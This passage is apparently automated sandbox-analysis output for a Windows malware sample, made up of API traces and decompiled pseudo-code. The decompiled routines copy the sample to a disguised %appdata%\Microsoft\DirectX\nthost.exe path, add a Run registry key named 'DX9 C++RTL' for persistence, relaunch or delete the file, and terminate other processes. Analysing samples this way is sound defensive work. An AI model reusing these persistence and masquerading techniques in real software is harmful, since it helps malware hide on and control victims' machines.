      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
